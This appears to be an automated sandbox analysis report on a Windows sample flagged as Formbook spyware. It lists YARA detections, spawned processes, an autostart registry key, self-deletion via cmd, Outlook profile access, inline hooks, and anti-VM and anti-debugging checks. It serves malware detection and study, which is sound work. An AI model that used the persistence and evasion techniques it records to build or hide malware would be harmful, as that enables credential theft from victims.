Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA, 0_2_00421830
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA, 0_2_00408E98
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA, 0_2_004146E8
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Roaming\55R0B44T Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini Jump to behavior
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: R6o4qCis6s.exe Virustotal: Detection: 77%
Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File written: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe
Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Unpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00444B40 push 00444BCDh; ret 0_2_00444BC5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482040 push 00482066h; ret 0_2_0048205E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472060 push 0047208Ch; ret 0_2_00472084
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482008 push 00482034h; ret 0_2_0048202C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00474134 push 00474160h; ret 0_2_00474158
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C274 push 0047C2A0h; ret 0_2_0047C298
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C22C push 0046C258h; ret 0_2_0046C250
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C2C0 push 0047C2ECh; ret 0_2_0047C2E4
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004722F4 push 00472320h; ret 0_2_00472318
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0042A2B4 push 0042A2E0h; ret 0_2_0042A2D8
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 push 0040C78Ch; ret 0_2_0040C784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004703C0 push 004703ECh; ret 0_2_004703E4
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E45C push 0041E502h; ret 0_2_0041E4FA
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046A48C push 0046A4B8h; ret 0_2_0046A4B0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472498 push 004724C4h; ret 0_2_004724BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428550 push 0042857Ch; ret 0_2_00428574
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A524 push ecx; mov dword ptr [esp], ecx 0_2_0043A528
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C5F4 push 0046C620h; ret 0_2_0046C618
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004705F4 push 00470620h; ret 0_2_00470618
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047267C push 004726A8h; ret 0_2_004726A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C610 push 0040C78Ch; ret 0_2_0040C784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CA push 0040671Dh; ret 0_2_00406715
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CC push 0040671Dh; ret 0_2_00406715
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004286E8 push 00428714h; ret 0_2_0042870C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A7F8 push 0047A824h; ret 0_2_0047A81C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C78E push 0040C7FFh; ret 0_2_0040C7F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C790 push 0040C7FFh; ret 0_2_0040C7F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A798 push 0047A7C4h; ret 0_2_0047A7BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E860 push 0041E88Ch; ret 0_2_0041E884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C86E push 0040C89Ch; ret 0_2_0040C894
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C870 push 0040C89Ch; ret 0_2_0040C894

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXP Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0045880C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00428920
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043ED90 IsIconic,GetCapture, 0_2_0043ED90
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00458F00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00458FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_0043F638
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_00455888
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00433C54 0_2_00433C54
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\R6o4qCis6s.exe RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\R6o4qCis6s.exe RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000002298D4 second address: 00000000002298DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000000229B3E second address: 0000000000229B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409A70 rdtsc 1_2_00409A70
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_00457DB0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00433C54 0_2_00433C54
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5632 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5632 Thread sleep time: -72000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7044 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421DC0 GetSystemInfo, 0_2_00421DC0
Source: explorer.exe, 00000002.00000000.230987745.0000000005775000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.493684230.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.493684230.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000002.00000002.495473601.0000000006548000.00000004.00000001.sdmp Binary or memory string: 26700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 00000002.00000000.231415908.0000000006414000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$%
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000002.493944220.0000000005775000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAppData
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409A70 rdtsc 1_2_00409A70
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0040ACB0 LdrLoadDll, 1_2_0040ACB0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00481D40 VirtualProtect ?,0000F7A0,00000104,?,00000000,0000F7A0,00003000,00000004 0_2_00481D40
Contains functionality to dynamically determine API calls
